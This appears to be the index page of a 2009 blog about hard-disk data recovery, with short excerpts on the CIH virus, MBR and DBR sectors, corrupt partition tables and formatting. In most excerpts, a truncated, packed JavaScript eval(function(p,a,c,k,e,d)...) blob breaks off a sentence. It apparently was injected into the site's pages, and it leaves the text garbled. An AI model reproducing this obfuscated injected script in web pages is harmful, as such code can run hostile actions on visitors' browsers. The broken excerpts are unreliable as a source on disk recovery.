As we all know, file eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
December 7, 2009 3:09 AM / no comments
CIH destroys data backwards from partitions. In this case, system data in the former part may be destroyed and lost. If FAT2 is still intact, we may make FAT2 to cover FAT1. Usually we use DiskEdit eval(function(p,a,c,k,e,d){e=function(c){return...
December 2, 2009 3:57 AM / no comments
MBR is for the whole hard disk, while DBR is for individual partition. The first sector of each MBR is DBR. Just as MBR, DBR contains some information that the boot operation system need. If DBR is corrupted, you can neither visit the partition...
December 2, 2009 3:48 AM / no comments
Partition tables become corrupt for various (often obscure) reasons, causing various symptoms, including but not limited to the following most common:
* Some volumes just disappear. Disk eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...
December 2, 2009 1:36 AM / no comments
The key to successful partition eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
December 2, 2009 1:13 AM / no comments
The physical disk can be divided into several logical disks (which you see as a separate drive letters like C:, or D: and so on), also called “volumes”.
The Master Boot Record (MBR) and optionally several Extended Partition Pointers...
December 1, 2009 9:49 AM / no comments
Recovery eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
November 28, 2009 4:10 AM / no comments
In command to know hard disk better, we must have a simple understanding of hard disk construction. (NTFS uses different file eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return...
November 28, 2009 3:50 AM / no comments
High-level eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new...
November 28, 2009 3:25 AM / no comments
Before restoring data, hard disk usually needs low-level format, partition, high-level format to be used. The function is establishing certain data logical structure on physical hard disk. Usually hard disk is divided into 5 regions: MBR, DBR,...
November 28, 2009 2:57 AM / no comments